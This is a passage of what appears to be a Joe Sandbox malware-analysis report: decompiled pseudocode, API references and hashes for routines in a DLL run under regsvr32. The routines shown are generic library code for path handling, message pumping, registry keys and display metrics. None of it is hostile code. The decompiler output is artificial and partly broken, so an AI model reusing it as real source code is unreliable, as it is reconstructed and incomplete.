                                                                                                            						_t12 =  &(_t22[5]); // 0x5
                                                                                                            						if(_a8 >= _t47 + _t12) {
                                                                                                            							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
                                                                                                            								do {
                                                                                                            									_t33 = E100127D1(_t33);
                                                                                                            								} while ( *_t33 != 0x5c);
                                                                                                            							}
                                                                                                            							 *((char*)(_t47 + _t40)) = 0;
                                                                                                            							lstrcatA(_t40, "\\...");
                                                                                                            							_t21 = lstrcatA(_t40, _t33);
                                                                                                            						} else {
                                                                                                            							_push(_v8);
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_a12 == 0) {
                                                                                                            							_t35 = 0x1003da51;
                                                                                                            						}
                                                                                                            						_push(_t35);
                                                                                                            						L14:
                                                                                                            						_t21 = lstrcpyA(_t40, ??);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t21;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                                                              • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                                                            • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                                                            • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                                                            • String ID: \...
                                                                                                            • API String ID: 1604900594-1167917071
                                                                                                            • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                                                            • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E100304C6(void* __ecx) {
                                                                                                            				struct tagMSG _v28;
                                                                                                            				void* __ebp;
                                                                                                            				int _t21;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t33;
                                                                                                            				void* _t38;
                                                                                                            				void* _t39;
                                                                                                            				int _t40;
                                                                                                            
                                                                                                            				_push(0);
                                                                                                            				_t39 = __ecx;
                                                                                                            				_t40 = 0xf;
                                                                                                            				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                                                            					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                                                            					if(_t21 != 0) {
                                                                                                            						DispatchMessageA( &_v28);
                                                                                                            						_push(0);
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					return _t21;
                                                                                                            				}
                                                                                                            				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                            				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
                                                                                                            				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
                                                                                                            				SetRectEmpty(_t39 + 0xc);
                                                                                                            				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                                                            				_t38 = E100220EE(_t40, GetDesktopWindow());
                                                                                                            				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
                                                                                                            					_push(3);
                                                                                                            				} else {
                                                                                                            					_push(0x403);
                                                                                                            				}
                                                                                                            				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
                                                                                                            				_t33 = E10029068();
                                                                                                            				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                                                            				return _t33;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetMessageA.USER32 ref: 100304E5
                                                                                                            • DispatchMessageA.USER32 ref: 100304F8
                                                                                                            • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                            • SetRectEmpty.USER32(?), ref: 10030528
                                                                                                            • GetDesktopWindow.USER32 ref: 10030540
                                                                                                            • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                            • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1192691108-0
                                                                                                            • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                                                            • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100358C8(intOrPtr __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _t32;
                                                                                                            
                                                                                                            				_t32 = __ecx;
                                                                                                            				_v24 = __ecx;
                                                                                                            				_v16 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                            				}
                                                                                                            				if(_v8 != 0) {
                                                                                                            					RegCloseKey(_v8);
                                                                                                            				}
                                                                                                            				if(_v12 != 0) {
                                                                                                            					RegCloseKey(_v12);
                                                                                                            				}
                                                                                                            				return _v16;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                                                            • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                            				void _v20;
                                                                                                            				int _t14;
                                                                                                            				int _t18;
                                                                                                            				intOrPtr* _t23;
                                                                                                            
                                                                                                            				if(E1000799F() == 0) {
                                                                                                            					if(_a4 != 0x12340042) {
                                                                                                            						L9:
                                                                                                            						_t14 = 0;
                                                                                                            						L10:
                                                                                                            						return _t14;
                                                                                                            					}
                                                                                                            					_t23 = _a8;
                                                                                                            					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                            						goto L9;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                            						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                            						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                            						_t18 = GetSystemMetrics(1);
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						 *(_t23 + 0x10) = _t18;
                                                                                                            						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                            						if( *_t23 >= 0x48) {
                                                                                                            							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
                                                                                                            						}
                                                                                                            						_t14 = 1;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return  *0x1004ee08(_a4, _a8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BA6
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BAD
                                                                                                            • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                            • String ID: B$DISPLAY
                                                                                                            • API String ID: 2307409384-3316187204
                                                                                                            • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                                                            • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10020D8D
                                                                                                            • GetWindowRect.USER32 ref: 10020DA8
                                                                                                            • ScreenToClient.USER32 ref: 10020DBB
                                                                                                            • ScreenToClient.USER32 ref: 10020DC4
                                                                                                            • EqualRect.USER32 ref: 10020DCE
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 443303494-0
                                                                                                            • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                                                            • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1001519D(void* __edi) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				long _t5;
                                                                                                            				long _t11;
                                                                                                            				long _t12;
                                                                                                            				long* _t17;
                                                                                                            
                                                                                                            				_t5 = GetLastError();
                                                                                                            				_t12 = _t5;
                                                                                                            				_t17 =  *0x1004f5e0( *0x1004c848);
                                                                                                            				_t18 = _t17;
                                                                                                            				if(_t17 == 0) {
                                                                                                            					_push(0x8c);
                                                                                                            					_push(1);
                                                                                                            					_t17 = E1001382A(_t12, __edi, _t17, _t18);
                                                                                                            					if(_t17 == 0) {
                                                                                                            						L4:
                                                                                                            						E10011400(0x10);
                                                                                                            					} else {
                                                                                                            						_push(_t17);
                                                                                                            						_push( *0x1004c848);
                                                                                                            						if( *0x1004f5e4() == 0) {
                                                                                                            							goto L4;
                                                                                                            						} else {
                                                                                                            							_t17[0x15] = 0x1004cb00;
                                                                                                            							_t17[5] = 1;
                                                                                                            							_t11 = GetCurrentThreadId();
                                                                                                            							_t17[1] = _t17[1] | 0xffffffff;
                                                                                                            							 *_t17 = _t11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				SetLastError(_t12);
                                                                                                            				return _t17;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                            • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                            • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1487844433-4125583295
                                                                                                            • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                                                            • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t155;
                                                                                                            				signed int _t167;
                                                                                                            				signed short _t168;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				void* _t172;
                                                                                                            				signed short _t181;
                                                                                                            				signed short _t183;
                                                                                                            				void* _t186;
                                                                                                            				signed short _t189;
                                                                                                            				signed short _t191;
                                                                                                            				signed short _t196;
                                                                                                            				signed short _t198;
                                                                                                            				signed short _t207;
                                                                                                            				long long* _t214;
                                                                                                            				intOrPtr* _t218;
                                                                                                            				void* _t220;
                                                                                                            				void* _t226;
                                                                                                            				void* _t229;
                                                                                                            				intOrPtr* _t231;
                                                                                                            				void* _t237;
                                                                                                            				void* _t240;
                                                                                                            				signed int _t243;
                                                                                                            				signed short _t244;
                                                                                                            				signed short _t245;
                                                                                                            				signed short _t249;
                                                                                                            				signed short _t253;
                                                                                                            				intOrPtr* _t254;
                                                                                                            				intOrPtr _t276;
                                                                                                            				void* _t318;
                                                                                                            				intOrPtr* _t326;
                                                                                                            				void* _t327;
                                                                                                            				signed long long _t335;
                                                                                                            
                                                                                                            				_t318 = __edx;
                                                                                                            				E10011BF0(0x1003b04c, _t327);
                                                                                                            				_t155 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
                                                                                                            				 *(_t327 - 0x30) = 0;
                                                                                                            				E10010592(_t327 - 0x40);
                                                                                                            				_t321 =  *((intOrPtr*)(__ecx + 0x54));
                                                                                                            				 *((intOrPtr*)(_t327 - 4)) = 0;
                                                                                                            				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
                                                                                                            				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
                                                                                                            				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
                                                                                                            					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                                                            					__imp__#9(_t327 - 0x40);
                                                                                                            				} else {
                                                                                                            					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
                                                                                                            					_t326 = __imp__#9;
                                                                                                            					__eflags = _t167 - 0x81;
                                                                                                            					if(__eflags > 0) {
                                                                                                            						_t168 = _t167 - 0x82;
                                                                                                            						__eflags = _t168;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							goto L47;
                                                                                                            						} else {
                                                                                                            							_t181 = _t168 - 1;
                                                                                                            							__eflags = _t181;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                                                            								__eflags = _t183;
                                                                                                            								if(_t183 != 0) {
                                                                                                            									__eflags =  *(_t327 - 0x23);
                                                                                                            									asm("fild qword [ebp-0x21]");
                                                                                                            									if( *(_t327 - 0x23) > 0) {
                                                                                                            										do {
                                                                                                            											_t129 = _t327 - 0x23;
                                                                                                            											 *_t129 =  *(_t327 - 0x23) - 1;
                                                                                                            											__eflags =  *_t129;
                                                                                                            											_t335 = _t335 *  *0x10040908;
                                                                                                            										} while ( *_t129 != 0);
                                                                                                            									}
                                                                                                            									__eflags =  *(_t327 - 0x22);
                                                                                                            									if( *(_t327 - 0x22) == 0) {
                                                                                                            										_t335 = st0;
                                                                                                            										asm("fchs");
                                                                                                            										st1 = _t335;
                                                                                                            									}
                                                                                                            									 *(_t327 - 0x78) = _t335;
                                                                                                            									 *((short*)(_t327 - 0x80)) = 5;
                                                                                                            									 *((char*)(_t327 - 4)) = 0xe;
                                                                                                            									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
                                                                                                            									_t186 = _t327 - 0x80;
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t189 = _t181;
                                                                                                            								__eflags = _t189;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                                                            									__eflags = _t191;
                                                                                                            									if(_t191 != 0) {
                                                                                                            										asm("fldz");
                                                                                                            										 *(_t327 - 0x20) = _t335;
                                                                                                            										 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                                                            										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
                                                                                                            										 *((short*)(_t327 - 0x70)) = 7;
                                                                                                            										 *(_t327 - 0x68) =  *(_t327 - 0x20);
                                                                                                            										 *((char*)(_t327 - 4)) = 0xf;
                                                                                                            										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
                                                                                                            										_t186 = _t327 - 0x70;
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t196 = _t189 - 1;
                                                                                                            									__eflags = _t196;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                                                            										__eflags = _t198;
                                                                                                            										if(_t198 != 0) {
                                                                                                            											asm("fldz");
                                                                                                            											 *(_t327 - 0x20) = _t335;
                                                                                                            											 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                                                            											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
                                                                                                            											 *((short*)(_t327 - 0xb0)) = 7;
                                                                                                            											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
                                                                                                            											 *((char*)(_t327 - 4)) = 0x10;
                                                                                                            											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
                                                                                                            											_t186 = _t327 - 0xb0;
                                                                                                            											goto L36;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										__eflags = _t196 - 1;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                                                            											__eflags = _t207;
                                                                                                            											if(_t207 != 0) {
                                                                                                            												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
                                                                                                            												 *((short*)(_t327 - 0xa0)) = 7;
                                                                                                            												 *((long long*)(_t327 - 0x98)) =  *_t214;
                                                                                                            												 *((char*)(_t327 - 4)) = 0x11;
                                                                                                            												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
                                                                                                            												_t186 = _t327 - 0xa0;
                                                                                                            												goto L36;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(__eflags == 0) {
                                                                                                            							_t218 = E10006B11(_t327 + 0xc, __eflags);
                                                                                                            							 *((char*)(_t327 - 4)) = 2;
                                                                                                            							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
                                                                                                            							 *((char*)(_t327 - 4)) = 3;
                                                                                                            							E10010578(_t220, _t327 - 0x40, _t220);
                                                                                                            							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            							_t276 =  *((intOrPtr*)(_t327 + 0xc));
                                                                                                            							goto L48;
                                                                                                            						} else {
                                                                                                            							__eflags = _t167 - 8;
                                                                                                            							if(__eflags > 0) {
                                                                                                            								__eflags = _t167 - 0xb;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
                                                                                                            									 *((char*)(_t327 - 4)) = 0xb;
                                                                                                            									E10010578(_t226, _t327 - 0x40, _t226);
                                                                                                            									_t186 = _t327 - 0x100;
                                                                                                            									goto L36;
                                                                                                            								} else {
                                                                                                            									__eflags = _t167 - 0xc;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            										 *((char*)(_t327 - 4)) = 1;
                                                                                                            										E10010578(_t229, _t327 - 0x40, _t229);
                                                                                                            										_t186 = _t327 - 0xf0;
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										__eflags = _t167 - 0xf;
                                                                                                            										if(_t167 > 0xf) {
                                                                                                            											__eflags = _t167 - 0x11;
                                                                                                            											if(__eflags <= 0) {
                                                                                                            												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                                                            												 *((short*)(_t327 - 0x60)) = 0x11;
                                                                                                            												 *((char*)(_t327 - 0x58)) =  *_t231;
                                                                                                            												 *((char*)(_t327 - 4)) = 6;
                                                                                                            												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
                                                                                                            												_t186 = _t327 - 0x60;
                                                                                                            												goto L36;
                                                                                                            											} else {
                                                                                                            												__eflags = _t167 - 0x12;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													goto L24;
                                                                                                            												} else {
                                                                                                            													__eflags = _t167 - 0x13;
                                                                                                            													if(__eflags == 0) {
                                                                                                            														goto L23;
                                                                                                            													}
                                                                                                            												}
